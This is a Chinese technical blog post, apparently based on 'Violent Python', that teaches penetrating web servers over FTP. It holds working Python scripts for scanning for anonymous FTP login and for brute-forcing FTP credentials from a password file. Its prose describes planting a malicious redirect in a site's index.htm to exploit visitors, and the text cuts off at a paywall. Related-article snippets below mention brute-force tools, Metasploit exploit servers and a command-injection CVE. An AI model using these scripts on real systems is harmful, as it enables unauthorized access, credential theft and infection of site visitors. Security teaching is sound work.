FTP暴力破解及恶意脚本注入

最新推荐文章于 2024-07-15 11:59:00 发布
最新推荐文章于 2024-07-15 11:59:00 发布
阅读量3k 收藏 4
点赞数 2
分类专栏: web 文章标签: FTP python 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Everywhere_wwx/article/details/82996570
版权

通过FTP连接WEB来渗透

检查受感染服务器的FTP日志。

一个自动的脚本连接到目标主机以确认它是否包含一个名为 index.htm 的默认主页。接下来攻击者上传了一个新的 index.htm 页面,可能包含恶意的重定向脚本。受感染的服务器渗透利用任何访问它页面的脆弱客户机。

可以利用 Python 的 ftplib 模块来构建一个小脚本,用来确认服务器是否允许匿名登录。函数 anonLogin()接受一个主机名反汇编一个布尔值来确认主机是否允许匿名登录。

为了确认这个布尔值,这个函数尝试用匿名认证生成一个 FTP 连接,如果成功,则返回“True”,产生异常则返回 “False”

用python构建匿名的FTP扫描器

# coding = UTF-8
import ftplib

def anonLogin(hostname):
    try:
        ftp=ftplib.FTP(hostname)
        ftp.login('anonymous','me@your.com')
        print('\n[*]'+str(hostname)+'FTP Anonymous Login Succeeded!')
        ftp.quit()
        return True
    except Exception as e:
        print('\n[-]'+str(hostname)+'FTP Anonymous Login Failed!')
        return False
    
host='192.168.95.179'
anonLogin(host)

利用ftplib暴力破解FTP用户认证

现在我们能扩展前面建立的 anonLogin()函数建立名为brutelogin()的函数。 这个函数接受主机名和密码文件作为输入返回允许访问主机的证书。注意,函数迭代文件的每一行,用冒号分割用户名和密码,然后这个函数用用户名和密码尝试登陆 FTP服务器。如果成功,将返回用户名和密码的元组,如果失败有异常,将继续测试下一行。如果遍历完所有的用户名和密码都没有成功,则返回包含 None的元组。

# coding = UTF-8
import ftplib


def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
        print('[+]Trying:' + userName + '/' + passWord)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print('\n[*]' + str(hostname) + 'FTP login Succeeded:' + userName + '/' + passWord)
            ftp.quit()
            return (userName, passWord)
        except Exception as e:
            pass

    print('\n[-] Could not brute force FTP credentials.')
    return (None, None)


host = '192.168.95.179'
passwdFile = 'userpass.txt'
bruteLogin(host, passwdFile)

在FTP服务器上寻找web页面

有了FTP访问权限,还要测试服务是否还提供了web访问,为了测试这个,首先要列出FTP的服务目录并寻找默认的web页面。

函数returnDefault()接受一个FTP连接作为输入并返回一个找到的默认页面的数组,通过发送目录NLST列出目录内容。这个函数检查每个文件返回默认web页面文件名并将任何发现的默认web页面文件名添加到名为retList的列表上。完成迭代这些文件之后,函数将返回这个列表

def returnDefault(ftp):
    try:
        # 列出目录内容
        dirList = ftp.nlst(
最低0.47元/天 解锁文章
Flemington、
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
这39个端口黑客最常攻击,看看有哪些?
网络技术联盟站
08-28 545
在计算机网络中,端口是指网络通信的端点,用于标识网络中不同的服务或应用程序。每个端口都对应一个特定的网络协议,并且在一个主机的IP地址上可以有多个端口同时开放。端口的编号范围从0到65535,其中较低编号的端口通常用于众所周知的服务(称为“知名端口”),例如HTTP(80端口)、HTTPS(443端口)、FTP(21端口)等。这些端口由IANA(Internet Assigned Numbers Authority)分配给特定的服务和协议。常见的服务如HTTP、FTP、SMTP等都在此范围内。
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
热门推荐
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
破解ftp密码
04-18
典型暴力破解FTP密码的工具。方便易用。RAR压缩包。大小1.5MB。
Violent Python FTP注入
qq_31017793的博客
01-05 321
# coding=UTF-8 # time: 18-1-5: 下午3:14 # Author: Xifeng2009 ''' 在网页中加入恶意注入代码 找到网页文件后,必须用恶意重定向代码感染它们, 为了快速创建一个位于 http://10.10.10.112:8080/exploit 的恶意服务器和页面, 我们将使用Metasploit框架, 选择ms10_002_aurora 10.10
Kali Linux 入侵和利用秘籍(二)
最新发布
龙哥盟
07-15 619
在上一章中,我们枚举了开放端口并搜索可能的漏洞。在本章中,我们将对网络上的系统进行渗透测试。为了演示目的,我们选择了一个名为Stapler的易受攻击的操作系统,由 g0tmi1k 制作。Stapler 可以在www.vulnhub.com/entry/stapler-1,150/下载。除了 Stapler,我们还将简要介绍如何利用 Metasploitable 2 进行利用,这在上一章中已经简要介绍过。本章的目的是向读者介绍一些网络级攻击向量,并演示不同类型的攻击。
Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)漏洞复现
weixin_51804748的博客
01-17 2012
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
ftp服务暴力破解
m0_71366428的博客
12-14 889
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
应急响应实战笔记——Windows实战篇:① FTP暴力破解
君逍遥o
04-07 843
FTP是一个文件传输协议,用户通过FTP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者通过FTP匿名访问或者弱口令获取FTP权限,可直接上传webshell,进一步渗透提权,直至控制整个网站服务器。
暴力破解ftp脚本
weixin_34114823的博客
04-15 197
============================= #! /bin/bash cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' > /root/black.txt awk '/no such user/' /var/log/secure|awk '{prin...
暴力破解笔记
m0_47599604的博客
03-15 415
目录 暴力破解 简介 危害 分类 B/S架构暴力破解 流程 弱口令 万能密码 后台查找方法 找寻后台地址 暴力破解目标 C/S架构暴力破解流程 hydra用法 hydra常用方法 字典生成 暴力破解 简介 暴力破解也叫穷举法,其基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也叫枚举法。针对账号,
ftp暴力破解软件
11-16
FTP 暴力破解程序非原创,支持作者。 FTP 暴力破解程序非原创,支持作者。 FTP 暴力破解程序非原创,支持作者。 FTP 暴力破解程序非原创,支持作者。
FTP端口扫描入侵工具
09-05
很好用的一款国外扫描网站后台的软件,扫FTP弱口令工具通过绿色认证
ftp溢出工具.适用于所有5.0以下的版本.
12-03
ftp溢出工具.适用于所有5.0以下的版本.
ftp破解共享软件
10-26
非常好的FTP服务器软件,它设置简单,功能强大,性能稳定。你现在就可以建立你自己的FTP服务器了。 设置简单,但功能却不错。做个人的 FTP 服务器是很好的选择。它并不是简单地提供文件的下载,还为用户的系统安全提供了相当全面的保护。例如:您可以为您的 FTP 设置密码、设置各种用户级的访问许可等等!
等保2.0测评手册之安全计算环境
AI
05-20 1577
可以将本文安全计算环境等保2测评手册直接用于工作中,整改工作内容:控制点,安全要求,要求解读,测评方法,预期结果或主要证据
metasploit 渗透测试(ftp
xul2009的专栏
04-13 1万+
晚上没事干,还不如
ftp系实战和ssl注入实战
weixin_51339377的博客
03-30 613
nmap进行扫描 发现目标开启的21号端口 ftp的服务 看到了ProFTPD 可以考虑一下使用一些其现成的漏洞 搜索漏洞库 我们也可以在msf中进行搜索 直接使用相应的漏洞即可 这是利用了一些软件的旧版本所存在的漏洞进行的提权 接下来是ssl注入实战 第一步正常nmap扫描 发现只开放了80端口 所以只能从web端入手了 后续发现网站url上是shtml 说明可能存在ssl注入的可能 使用nikto对其进行扫描 有可能存在ss...
常见端口
PpikachuP的博客
03-27 1011
linux产看端口 #ss -tnl SMTP邮件服务 25端口 talnet 23端口 23端口是telnet的端口。Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值